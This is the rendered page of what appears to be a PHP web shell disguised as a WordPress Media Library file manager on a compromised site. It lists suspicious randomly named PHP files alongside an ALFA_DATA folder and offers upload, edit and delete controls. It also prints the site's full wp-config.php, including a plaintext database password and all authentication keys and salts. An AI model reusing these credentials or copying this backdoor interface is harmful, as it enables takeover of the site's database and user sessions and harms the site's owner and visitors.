⚙ WordPress Media Library
File manager
📁 Media Files
📋 .ent
📋 .htaccess
📋 .k
📋 .res
📋 .tmb
📋 ALFA_DATA
📋 CYEC07_2winners
📋 adv_counter
🔧 drum.php
🔧 dz2obinl.php
🔧 get.php
🌐 google00199521a7227898.html
🌐 google04df80ca1b1ccf54.html
🌐 google0a32d1bf32902599.html
🌐 google80933f13bdd078a6.html
🌐 googleea78e552fedf758c.html
🔧 hiroshi.php
🔧 index.php
🔧 item.php
📄 license.txt
🔧 m00emf1a.php
🔧 main.php
🔧 nrhshh40.php
🌐 readme.html
🔧 retries.php
📄 robots.txt
🔧 srtain.php
🔧 wp-activate.php
📋 wp-admin
🔧 wp-blog-header.php
🔧 wp-comments-post.php
🔧 wp-config.php
📋 wp-content
🔧 wp-cron.php
📋 wp-includes
🔧 wp-links-opml.php
🔧 wp-load.php
🔧 wp-login.php
🔧 wp-mail.php
🔧 wp-settings.php
🔧 wp-signup.php
📋 wp-slgnup.gz
🔧 wp-trackback.php
🔧 xmlrpc.php
⬆️ Upload Media
Upload File
📝 Edit: wp-config.php
Size: 3.56 KB | Modified: 2026-07-02 08:16:04
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'vanvango_wp_nordesvan' ); /** Database username */ define( 'DB_USER', 'vanvango_nordesvan' ); /** Database password */ define( 'DB_PASSWORD', 'pziH83e:ZLIX/QeW' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'bCJ5kih|!Wc_OOI^B=2~^AE&Q6PFerH/:6~BWf#8=mn.)ZOPMP47pwHLYtn6#5q|' ); define( 'SECURE_AUTH_KEY', 'AT|;J=l/yi/V| &G|KPymTjOX^][{xty(OwPZR-]4Es5G>ar;`*V~?+J3eIjS}-7' ); define( 'LOGGED_IN_KEY', '7*^s%I@zfgK?uw=<v%$ZsdFjua0^*JNatuPsy*W.Dz??hMAbOum9.qa6?DKjsK j' ); define( 'NONCE_KEY', '{1>nX*KIrnX/zqSN6e-?x6,$>pcdF#bM Ty?E3/Qu_7R`n`mUHN)NsR.czu!wT<x' ); define( 'AUTH_SALT', '_A8,tj>>{=rNCP>ixvZ+CiiH)g2r9bcGti$+=ZQBX]?iBI.8OS H,-`*|qJ[mVLO' ); define( 'SECURE_AUTH_SALT', 'ArLHmX,f%gpxfo?et;:TbG4LA;%u^(l*x`Sqg<$<.wf%Bz0P*@YJ%~0m;;oc{-(!' ); define( 'LOGGED_IN_SALT', '_<yyxC0jEKCZ(:db$,54/+L)1M P}?*mw0^r]dN^NneVMa1D%@+ZblUuEH{M(]?^' ); define( 'NONCE_SALT', 'uh`s&`c`dO^m{Gz,%TGd623&GdHQS)*@KA*Oa3D|PH?Uh=Jz?=82ZaA1ydUq^[%P' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
💾 Save Changes
📥 Download
🗑️ Delete